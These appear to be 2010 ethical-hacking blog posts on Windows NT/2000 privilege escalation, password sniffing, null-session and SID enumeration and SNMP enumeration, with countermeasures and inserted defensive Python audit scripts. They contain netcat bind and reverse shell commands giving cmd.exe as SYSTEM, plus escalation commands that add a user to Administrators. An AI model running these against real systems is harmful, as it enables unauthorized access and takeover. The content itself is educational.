Saturday, February 27, 2010

Access to the network using non-admin user account

Privilege Escalation


If an attacker gains access to the network using a non-admin user account, the next step is to gain higher privileges, up to those of an administrator. This is called privilege escalation.

Once an intruder has access to a remote system with a valid username and password, the attacker will attempt to escalate the account in use to one with increased privileges, such as that of an administrator. For example, if the attacker has access to a W2K SP1 server, he can run a tool such as ERunAs2X.exe to escalate his privileges to that of SYSTEM by using "nc.exe -l -p 50000 -d -e cmd.exe". Note this can also be used remotely.

For instance, the named pipes prediction flaw in Windows 2000 allows interactively logged-on users to impersonate the SYSTEM account and execute arbitrary programs with those privileges. By reading the Registry key HKLM\SYSTEM\CurrentControlSet\Control\ServiceCurrent, an attacker can anticipate the next named pipe and create the pipe before the SCM creates a pipe with the same name. When a new service is started, it connects to this malicious pipe. When the attacker instructs the SCM to start an arbitrary service that runs with high privileges (such as ClipBook, which runs as SYSTEM), the SCM connects the service to the malicious pipe. Run c:\>PipeUpAdmin. The program then adds the user to the local Administrators group. The attacker can conclude his privilege escalation by logging out and then logging in.


Countermeasure: General privilege escalation countermeasures include restricting interactive logons and access to system programs that users do not require, such as cmd.exe, and auditing account logon events (success, failure), privilege use (success, failure) and system events (success, failure).


Tool: GetAdmin


GetAdmin.exe is a small program that adds a user to the local administrators group.


It uses a low-level NT kernel routine to set a global flag allowing access to any running process.


You need to log on to the server console to execute the program.


The GetAdmin.exe is run from the command line or from a browser.


This only works with NT 4.0 Service Pack 3.


On an NT machine GetAdmin attaches to the WinLogon process, which runs in the system's security context, and makes standard API calls that will add the specified user to the administrators group. This is a classic instance of privilege escalation. Though Microsoft issued a hotfix, any user who has been granted the rights to "Debug Programs" will always be able to run the program successfully. This is possible because the "Debug Programs" right allows a user to attach to any process. The "Debug Programs" right is initially granted to Administrators and ideally should be only granted to fully trusted users.


Similarly, if GetAdmin.exe is run by a user who is already a member of the local administrators group, it will continue to work (even after applying the hotfix). This is possible because members of the administrators group always have the rights to make the calls GetAdmin needs in order to succeed. GetAdmin.exe cannot be used remotely and must be executed locally. It works for accounts on a workstation or member server and for domain accounts on a primary domain controller (PDC). However, the tool does not function on a backup domain controller (BDC) because the account database on a BDC is read-only. Therefore the only way to use GetAdmin to modify a domain account database is to log on to a primary domain controller and run the utility locally on the PDC.

Tool: hk.exe


The hk.exe utility exposes a Local Procedure Call flaw in NT.


A non-admin user can be escalated to the administrators group using hk.exe.


C:\>net localgroup administrators peter /add
Access Denied
------------------------------------------------
c:\>hk net localgroup administrators peter /add
lsass pid & tid are: 47 -48
NtImpersonateClientOfPort succeeded


hk.exe takes advantage of the vulnerability in the API call to NT_Impersonate and allows the user to get the token of a kernel thread (LSASS or equivalent). The tool is a command-line executable, and the user just needs to key in hk followed by any command he would want to run if he had NT AUTHORITY\SYSTEM level privileges. Note that this is above the Administrator account privileges.


nc -l -p 23
nc -d -e cmd.exe 192.168.xx.xx 23 (Done on the active netcat running on the webserver)
hk2 nc -d -e cmd.exe 192.168.xx.xx 23
lsass pid & tid are: 50 - 53


The NtImpersonateClientOfPort call succeeds because of the way port communication takes place between the client system and the server. During a conversation, although the server receives a new handle from NtAcceptConnectPort for each client that connects, it usually does not use that handle when communicating with its clients. Instead, it uses the original handle it got from the NtCreatePort call.

Password Sniffing

Password guessing is hard work. Why not just sniff credentials off the wire as users log in to a server and then replay them to gain access?
Most networks use broadcast technology, which means that every message emanating from any computer on the network can be captured by every other computer on the network. Normally, the message is not taken by other computers because the intended recipient's MAC address does not match their own MAC address. Therefore, all the computers except the recipient will notice that the message is not meant for them and ignore it. However, if a system has a sniffer program running on it, it can scan all the messages that traverse the network, looking for passwords and other sensitive information. For instance, if a user logs in to a computer across the network and the attacker's system is running a sniffer program, the attacker can sniff out the login information, such as the user name and its corresponding password. This will make it easy for the attacker to log in to the target system as an authentic user and compromise it further. This technique is called password sniffing.

This is a serious threat to users, such as remote users, who log in to computers from remote sites. Therefore, the password security of a remote user is only as good as the network he/she uses to access the remote computer.

Hacking Tool: L0phtCrack

•LC4 is a password auditing and recovery package distributed by @stake software. SMB packet capture listens to the local network segment and captures individual login sessions.
•With the L0phtCrack password-cracking engine, anyone who can sniff the wire for extended periods is almost guaranteed to obtain Administrator status in a matter of days.

Windows operating systems based on the LAN Manager networking protocols use an authentication system that consists of transmitting a hashed twenty-four-byte password across the network from client to server in a challenge/response format. The hashed password from the client is compared with the hash of the same password in the server's database. A match results in authentication. However, the problem lay in the weak hash algorithm and the conversion of the password to uppercase (thereby eliminating case sensitivity). The algorithm divided the password into seven-character segments and hashed them individually. This allowed the attacker to restrict password cracking to seven letters at a time, which also made it easier. The weakness of the password hash, coupled with the transmission of the hash across the network in the challenge/response format, made LM-based systems highly susceptible to password interception and brute-force attack by L0phtCrack.

In Windows NT, however, case sensitivity was included to strengthen the password, but coupling LM authentication with the NTLM authentication scheme for backward compatibility with LAN Manager-based systems resulted in both hashes being sent across the network for authentication and being stored in the password databases. This resulted in L0phtCrack capturing and cracking the much simpler LM password and then applying the results of that broken hash to the NTLM hash to determine any differences.
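A defender's check for the stored-LM weakness described above, as an added example that is not part of the original page: it reads pwdump-style `user:rid:lm:nt:::` lines, flags accounts that still store an LM hash, and reports halves shared between accounts (the halves are unsalted, so equal halves mean equal 7-character segments). The sample lines and their hash values are constructed; only the empty-half constant is a real, well-known value.

```python
"""Audit a pwdump-style SAM export for stored LM hashes (added example)."""
from collections import defaultdict

# LM hash of an empty 7-character half (well-known constant).
EMPTY_LM_HALF = "aad3b435b51404ee"

# Constructed sample in pwdump layout: user:rid:lm_hash:nt_hash:::
# All hash values are made up for illustration, except the empty-half constant.
SAMPLE = """\
Administrator:500:1f2e3d4c5b6a7988aad3b435b51404ee:0123456789abcdef0123456789abcdef:::
svc_backup:1004:1f2e3d4c5b6a79880a1b2c3d4e5f6071:89abcdef0123456789abcdef01234567:::
alice:1005:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
bob:1006:NO PASSWORD*********************:76543210fedcba9876543210fedcba98:::
"""


def parse_line(line):
    """Return (user, rid, lm, nt), or None for a malformed line."""
    parts = line.strip().split(":")
    if len(parts) < 4 or not parts[1].isdigit():
        return None
    return parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()


def is_hex32(value):
    return len(value) == 32 and all(c in "0123456789abcdef" for c in value)


def audit(text):
    """Return (findings per user, LM halves shared by more than one user)."""
    findings = {}
    halves = defaultdict(set)
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        user, _rid, lm, _nt = rec
        # A placeholder or two empty halves: no usable LM hash is stored
        # (empty password, LM storage disabled, or password over 14 chars).
        if not is_hex32(lm) or lm == EMPTY_LM_HALF * 2:
            findings[user] = "no LM hash stored"
            continue
        first, second = lm[:16], lm[16:]
        if second == EMPTY_LM_HALF:
            findings[user] = "LM stored; password is 7 characters or fewer"
        else:
            findings[user] = "LM stored; two independent 7-character halves"
        for half in (first, second):
            if half != EMPTY_LM_HALF:
                halves[half].add(user)
    shared = {h: sorted(u) for h, u in halves.items() if len(u) > 1}
    return findings, shared


if __name__ == "__main__":
    results, shared_halves = audit(SAMPLE)
    for name, verdict in results.items():
        print(f"{name:15} {verdict}")
    for half, users in shared_halves.items():
        print(f"shared LM half {half}: {', '.join(users)}")
```

Any account reported with a stored LM hash should have its password changed after LM hash storage is disabled, since the old hash stays in the database until then.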

Hacking Tool: KerbCrack

•KerbCrack consists of two programs, kerbsniff and kerbcrack. The sniffer listens on the network and captures Windows 2000/XP Kerberos logins. The cracker can be used to find the passwords from the capture file using a brute-force attack or a dictionary attack.
KerbCrack demonstrates the possibility of obtaining user passwords by simply listening to the initial Kerberos logon exchange. Let us explore how this can also be vulnerable to brute force attacks.
In general, encryption protocols such as Kerberos can be circumvented under the following four scenarios:
•The attacker is able to steal the encrypted key — by any means possible.
•The attacker finds a flaw in the implementation of the protocol - attributable to the vendor.
•The attacker finds a flaw in the protocol itself — which is highly unlikely.
•The attacker tries all possible keys in a brute-force approach. This is a possibility.

Password guessing Countermeasures

•Block access to TCP and UDP ports 135–139.
•Disable bindings to Wins client on any adapter.
•Use complex passwords
•Log failed logon attempts in Event viewer - Security log full event 529 or 539 - Logon/Logoff
Monitoring Event Viewer Logs
•Logging is of no use if no one ever analyzes the logs
•VisualLast from http://www.foundstone.com/ formats the event logs visually
VisualLast is considered the advanced version of NTLast, with a number of additional and sophisticated features. The program is designed to allow network administrators to view and report individual users' logon and logoff times, and these events can be searched by time frame. This is an invaluable feature to security analysts looking for intrusion details.

Administrator Password Guessing



•Assuming that NetBIOS TCP port 139 is open, the most effective method of breaking into NT/2000 is password guessing.
•Attempting to connect to an enumerated share (IPC$ or C$) and trying username/password combinations.
•Default Admin$, C$, %Systemdrive% shares are a good starting point.
One common security lapse is to leave the built-in Administrator account with a null password. Password guessing appeals to the attacker because complicated passwords are difficult to remember, and hence users tend to choose the easiest password possible. Users often choose something that is easy to remember, like a birthday, a pet's name or a kid's name. Examples of these common user/password combinations can be downloaded all over the Internet.
One can categorize password guessing attacks by the amount of interaction they require with an authentication system. They are considered to be on-line attacks when the perpetrator must make use of an authentication system to check each guess of a password. In an off-line attack, on the other hand, the attacker obtains information (e.g. a password hash) that allows him to check password guesses on his own, without any further access to the system. On-line attacks are generally considered slower than off-line ones.
Automated password attacks can be divided into two basic categories, dictionary attacks and brute force attacks.
•A simple dictionary attack involves loading a dictionary file (a text file full of dictionary words) into a cracking application such as L0phtCrack or John the Ripper, and running it against user accounts located by the application. The larger the word and word fragment selection, the more effective the dictionary attack is.
•The brute force method is the most inclusive - though slow. Usually, it tries every possible letter and number combination in its automated exploration.
•A hybrid approach is one which combines features of both the methods mentioned above. It usually starts with a dictionary and then tries combinations such as two words together or a word and numbers.
Legion automates the locating and connecting of Windows-based shares. The software depends on the user not protecting their shares with passwords before connecting to the Internet. The software also has a brute-force password cracking plug-in that can be used to find passwords for shares that are protected.
Legion polls a wide range of IP addresses to check for the availability of shared folders. The application broadcasts a NetBIOS request across the LAN to find all computers that have NetBIOS services. The application then searches each polled computer for available shares and displays the results. Once these shares are known, there is little to do on the administrator's part to detect or deter brute force password guessing. The commercial version of Legion has an option to brute force crack any shares that were identified as shared but password protected. The vulnerable system can have its drive mapped to the attacker's system, and he can use this point of access for further nefarious activities such as installing Trojans, stealing information and even corrupting the system, thereby resulting in a denial of service. The most obvious countermeasure is to make sure that File and Print Sharing is disabled. If sharing is required, it must be password protected and allowed only to specific IP addresses, because DNS names can be spoofed. The system must also restrict null sessions.
NTInfoScan is a security scanner for NT 4.0. It is a vulnerability scanner that produces an HTML-based report of security issues found on the target system, along with further information.
NTInfoScan (now Cerberus Internet Scanner) is a vulnerability scanner designed by David Litchfield specifically to address the security concerns of the Windows NT 4.0 operating system. It still works with Windows 2000, and the HTML-based report highlights the security issues found on the target system along with further information. It tests a number of services, such as ftp, telnet and the web service, for security problems. In addition, NTInfoScan will check NetBIOS for share security and user account security.

Friday, February 26, 2010

Enumeration Tools

Hacking Tool: Enum

Enum is a console-based Win32 information enumeration utility.
Using null sessions, enum can retrieve user lists, machine lists, share lists, name lists, group and membership lists, password and LSA policy information.
enum is also capable of rudimentary brute force dictionary attack on individual accounts.
enum is a tool written by Jordan Ritter to enumerate Win NT/2000 information using null and user sessions.

Hacking tool: Userinfo

•Userinfo is a little function that retrieves all available information about any known user from any NT/Win2k system that you can hit 139 on.
•Specifically calling the NetUserGetInfo API call at Level 3, Userinfo returns standard info like
◦SID and Primary group
◦logon restrictions and smart card requirements
◦special group information
◦pw expiration information and pw age
•This application works as a null user, even if RestrictAnonymous (RA) is set to 1 to specifically deny anonymous enumeration.

Hacking Tool: GetAcct

GetAcct sidesteps "RestrictAnonymous=1" and acquires account information on Windows NT/2000 machines. Input the IP address or NetBIOS name of a target computer in the "Remote Computer" column. Input a number of 1000 or more in the "End of RID" column. The RID is the user's relative identifier, which the Security Accounts Manager assigns when the user is created. Therefore, it is input as 1100 if there are 100 users.
GetAcct shows the information that leaks by opening an anonymous login and showing the following information:
◦An enumeration of user IDs,
◦account names and full names
◦Password age
◦User groups the user is a member of
◦Account type
◦Whether the account is disabled or locked
◦Password policies
◦Last logon time, Number of logons
◦Bad password count
◦Quotas


SNMP Enumeration Countermeasures

Countermeasure: Do not install the Management and Monitoring Windows component if it is not going to be used. If it is required, ensure that only legally authorized persons have access to it; otherwise it might turn into an obvious backdoor. Edit the Registry to permit only approved access to the SNMP community name.
Countermeasure: Change 'community' to properly configured ones, preferably with private community names (not the default "public"). Where possible, restrict access to the SNMP agent. By restriction, we mean allowing SNMP requests from only specific addresses. Additionally, these requests should be restricted to read-only wherever possible. All these configurations can be done by changing the properties of the 'SNMP Service' (Start/Administrative Tools/Services).
Countermeasure: Authenticate/encrypt using IPSec. SNMP (V1) may not have adequate authentication and encryption facilities built in, but this is where IPSec can come to the rescue. IPSec policies can be defined in the monitored systems and management stations so that all SNMP traffic is authenticated and/or encrypted.
Countermeasure: Collect traps. If SNMP is enabled, monitor the Windows 2000 event logs. Effective auditing can actually raise the level of security.

Saturday, February 6, 2010

Identifying Accounts


Two powerful NT/2000 enumeration tools are:
sid2user
user2sid
They can be downloaded at (www.chem.msu.su/~rudnyi/NT/)
These are command line tools that look up NT SIDs from username input and vice versa.


user2sid and sid2user are two small utilities for Windows NT/2000 that allow the user to query the SAM and find out a SID value for a given account name and vice versa. These utilities are actually command line interfaces to the WIN32 functions LookupAccountName and LookupAccountSid. It happens that to use these functions a user only has to be a member of EVERYONE. It means that an ordinary user can find without a problem the built-in domain administrator name, which MS recommends renaming from administrator to something else.
User2sid.exe can retrieve a SID from the SAM (Security Accounts Manager) of the local or a remote machine. Sid2user.exe can then be used to retrieve the names of all the user accounts and more. Windows NT/2000 keeps track of user accounts and groups with Security Identifiers or SIDs. All SIDs are unique within a given system and are issued by what is known as an "Authority", such as a domain. There are five authorities:
SECURITY_NULL_SID_AUTHORITY (null user)
SECURITY_WORLD_SID_AUTHORITY (everyone)
SECURITY_LOCAL_SID_AUTHORITY (local user)
SECURITY_CREATOR_SID_AUTHORITY (creator owner /group)
SECURITY_NT_AUTHORITY
Note the default SIDs that capture a cracker's interest.

Administrator S-1-5-21-<........................>-500
Guest S-1-5-21-<........................>-501
Domain Admins S-1-5-21-<........................>-512
Domain Users S-1-5-21-<........................>-513
Domain Guest S-1-5-21-<........................>-514

Let us take a look at the attack.
Here we try for the default built-in Administrator account - and we get access to more information such as domain and number of sub authorities.
Had we found the default guest account, we could escalate it to the Administrators group by changing the RID using sid2user.
c:\>sid2user \\196.xxx.xxx.xx 5 21 1123561549 1788223846 725345447 500
This will change the guest account to that of an administrator account. The last three digits (here 500) are the relative identifier (RID). Once a RID has been issued it will never be used again. Any group or user that is not created by default will have a RID of 1000 or greater.
Net use, user2sid and sid2user all operate over TCP port 139 (NetBIOS session). The reason why these utilities work despite ACLs being in place is that LookupAccountName and LookupAccountSid don't have an ACL on them.
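The SID layout discussed above, as an added example that is not part of the original post: it decodes a binary SID, maps the sid2user argument form to the usual S-1-... string, names the issuing authority, and classifies the RID, which is how an audit finds the built-in Administrator account even after it has been renamed. The account names in the sample inventory are constructed; the domain values are the ones in the sid2user command above.

```python
"""Decode Windows SIDs and classify the account by RID (added example)."""
import struct

# The five identifier authorities listed above, keyed by numeric value.
AUTHORITIES = {
    0: "SECURITY_NULL_SID_AUTHORITY",
    1: "SECURITY_WORLD_SID_AUTHORITY",
    2: "SECURITY_LOCAL_SID_AUTHORITY",
    3: "SECURITY_CREATOR_SID_AUTHORITY",
    5: "SECURITY_NT_AUTHORITY",
}
DEFAULT_RIDS = {500: "Administrator", 501: "Guest", 512: "Domain Admins",
                513: "Domain Users", 514: "Domain Guest"}

# Constructed inventory (account name -> SID); account names are made up.
DOMAIN = "S-1-5-21-1123561549-1788223846-725345447"
SAMPLE_ACCOUNTS = {
    "ops-root": DOMAIN + "-500",
    "Guest": DOMAIN + "-501",
    "peter": DOMAIN + "-1001",
}


def sid_from_bytes(raw):
    """Binary SID: revision, sub-authority count, 6-byte big-endian
    authority, then little-endian 32-bit sub-authorities."""
    if len(raw) < 8:
        raise ValueError("SID too short")
    revision, count = raw[0], raw[1]
    if revision != 1 or count > 15 or len(raw) != 8 + 4 * count:
        raise ValueError("malformed SID")
    authority = int.from_bytes(raw[2:8], "big")
    subs = struct.unpack("<%dI" % count, raw[8:])
    return "-".join(["S", "1", str(authority)] + [str(s) for s in subs])


def sid_from_sid2user_args(args):
    """sid2user takes the SID without 'S-1' and with spaces for dashes."""
    fields = args.split()
    if not fields or not all(f.isdigit() for f in fields):
        raise ValueError("expected space-separated numbers")
    return "S-1-" + "-".join(fields)


def describe(sid):
    """Return the authority name, the RID (if an account SID) and its class."""
    parts = sid.split("-")
    if len(parts) < 3 or parts[0] != "S" or not all(p.isdigit() for p in parts[1:]):
        raise ValueError("not a SID string: %r" % sid)
    authority = int(parts[2])
    subs = [int(p) for p in parts[3:]]
    info = {"authority": AUTHORITIES.get(authority, "unknown (%d)" % authority),
            "rid": None, "kind": "not a domain/machine account SID"}
    # Account SIDs have the form S-1-5-21-<three values>-<RID>.
    if authority == 5 and len(subs) == 5 and subs[0] == 21:
        rid = subs[-1]
        info["rid"] = rid
        if rid in DEFAULT_RIDS:
            info["kind"] = "default: " + DEFAULT_RIDS[rid]
        elif rid >= 1000:
            info["kind"] = "created after installation"
        else:
            info["kind"] = "other built-in"
    return info


def builtin_administrator(accounts):
    """Return the name holding RID 500, whatever it has been renamed to."""
    for name, sid in accounts.items():
        if describe(sid)["rid"] == 500:
            return name
    return None


if __name__ == "__main__":
    print(describe(sid_from_sid2user_args(
        "5 21 1123561549 1788223846 725345447 500")))
    print("RID 500 is held by:", builtin_administrator(SAMPLE_ACCOUNTS))
```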

SNMP Enumeration

SNMP is simple. Managers send requests to agents, and the agents send back replies. The requests and replies refer to variables accessible to agent software.
Managers can also send requests to set values for certain variables.
Traps let the manager know that something significant has happened at the agent's end of things:
---a reboot
---an interface failure,
---or that something else that is potentially bad has happened.
Enumerating NT users via the SNMP protocol is easy using snmputil.
SNMP consists primarily of two objects: a manager and an agent. An agent consists of a piece of software embedded in a machine. SNMP agents exist for almost any piece of equipment. However, the installed agent doesn't do anything for the machine until queried by the manager. The manager is a separate program that a network manager runs on their own computer to query the agent (across the network) for information.
The default community string that provides the monitoring or read capability is often "public". The default management or write community string is often "private". The SNMP exploit takes advantage of these default community strings to allow an attacker to gain information about a device using the read community string "public", and the attacker can change a system's configuration using the write community string "private".
SNMPutil example


The security threat comes from Windows 2000 servers and workstations having SNMP support enabled and failing to change the default read-only community string 'Public'. However, changing the string does not protect it from attackers sniffing it from the network or subjecting it to a dictionary or brute force attack. This may not seem troublesome, but the Windows 2000 SNMP variables contain a wealth of information for the sniffing cracker. Some of the tables that are available when one has READ access to the SNMP tree in a Windows 2000 box are listed below:
Interface Table - This table identifies all boxes with multiple interfaces, plus useful details like their IP and MAC addresses.
Route Table and ARP Table - With access to these tables, a cracker can quickly build an accurate picture of a network and continue its search for vulnerabilities.
TCP Table and UDP Table - These will show which TCP and UDP ports are actively used, and on which ports services are listening for new clients.
Device Table and Storage Table - Knowing what hardware is attached to a Windows 2000 machine gives crackers clues about what kind of machine it is dealing with.
Process Table and Software Table - Knowing what software is installed and what software is running (DNS server, DHCP server) gives away details about how to attack the system. They even show which service packs have been installed (and which patches are missing).
User Table - Knowing which user names are valid on a machine makes it much easier to guess passwords and gain access to a system.
Share Table - If the cracker knows what shares are exported and used by a Windows machine, it can lead to a serious security compromise.
Here, we will look at an SNMP utility called SNMPutil.exe which is a part of the Windows 2000 resource kit. Let us take a look at what we can discover with it from the command line prompt.
In this output, the variable is called 1.3.6.1.2.1.1.2.0, and we 'get' its value, which turns out to be 1. The variable name (1.3.6.1.2.1.1.2.0) is called an object identifier or OID. An alternative to this is found in the second line of the output shown here. The 'interfaces.ifNumber.0' is the same OID, but is more easily readable. The second and third arguments to SNMPUTIL designate the host to which the SNMP request will be sent (210.212.69.129) and the community (authentication string or password) to use (public). The 'public' community is the default when SNMP support is installed on a Windows 2000 host, and it allows the user to read all variables present. Since even the number of interfaces in a host is sensitive data, the threat is evident. Let us look at some of the other variables that might be of interest to an attacker and a security professional.
IpForwarding (1.3.6.1.2.1.4.1.0) - Is the host forwarding? This is not a good sign for a workstation.
IcmpInRedirects (1.3.6.1.2.1.5.7) - Is the host redirecting icmp messages?
TcpOutRsts (1.3.6.1.2.1.6.15) - A counter indicating the number of RSTs sent by the box. This counter will increase rapidly when port-scanned.
UdpNoPorts (1.3.6.1.2.1.7.2) - A counter indicating traffic to ports where no service was present. Also a possible port-scan signal.
SNMP walk automates the whole process of getting the variables and can be redirected to an output file. To summarize, Snmputil can reveal details about services that are running, share names, share paths, any comments on shares, usernames and domain names etc.
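The port-scan signal from TcpOutRsts and UdpNoPorts described above, turned into a monitoring check as an added example that is not part of the original post: it converts periodic counter samples into per-second rates, handles 32-bit counter wrap and agent restarts, and flags intervals above a threshold. The samples, the 60-second polling interval and the thresholds of 20 per second are constructed assumptions; in practice the values would come from polling the OIDs listed above together with sysUpTime.

```python
"""Flag likely port scans from SNMP counter samples (added example)."""

COUNTER32_MOD = 2 ** 32  # both counters are 32-bit and wrap to zero

# Constructed samples: (unix_seconds, sysUpTime_ticks, tcpOutRsts, udpNoPorts)
SAMPLES = [
    (0,   100000, 4294967000, 120),
    (60,  106000, 4294967120, 130),   # quiet interval
    (120, 112000, 2704,       140),   # tcpOutRsts wrapped while rising fast
    (180, 118000, 2764,       6140),  # burst of UDP to closed ports
    (240, 500,    3,          1),     # agent restarted: counters reset
    (300, 6500,   63,         7),     # quiet again
]


def counter_delta(prev, cur):
    """Difference between two Counter32 readings, allowing one wrap."""
    return (cur - prev) % COUNTER32_MOD


def rates(samples):
    """Yield (time, rst_per_s, noport_per_s) for each usable interval."""
    out = []
    for (t0, up0, r0, u0), (t1, up1, r1, u1) in zip(samples, samples[1:]):
        dt = t1 - t0
        if dt <= 0:
            continue  # out-of-order or duplicate sample
        if up1 < up0:
            continue  # sysUpTime went backwards: restart, deltas are invalid
        out.append((t1, counter_delta(r0, r1) / dt, counter_delta(u0, u1) / dt))
    return out


def scan_intervals(samples, rst_per_s=20.0, noport_per_s=20.0):
    """Return [(time, [counter names over threshold])] for noisy intervals."""
    alerts = []
    for t, rst, noport in rates(samples):
        reasons = []
        if rst >= rst_per_s:
            reasons.append("tcpOutRsts")
        if noport >= noport_per_s:
            reasons.append("udpNoPorts")
        if reasons:
            alerts.append((t, reasons))
    return alerts


if __name__ == "__main__":
    for when, why in scan_intervals(SAMPLES):
        print(f"t={when}s possible port scan, rising: {', '.join(why)}")
```

Without the sysUpTime check, the restart at t=240 would be read as a counter wrap and produce a false alert of roughly 70 million resets per second.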
SNMP Enumeration Countermeasures
The simplest way to prevent such activity is to remove the SNMP agent or turn off the SNMP service.
If shutting off SNMP is not an option, then change the default 'public' community name.
Implement the Group Policy security option called Additional restrictions for anonymous connections.
Access to null session pipes and null session shares, and IPSec filtering should also be restricted.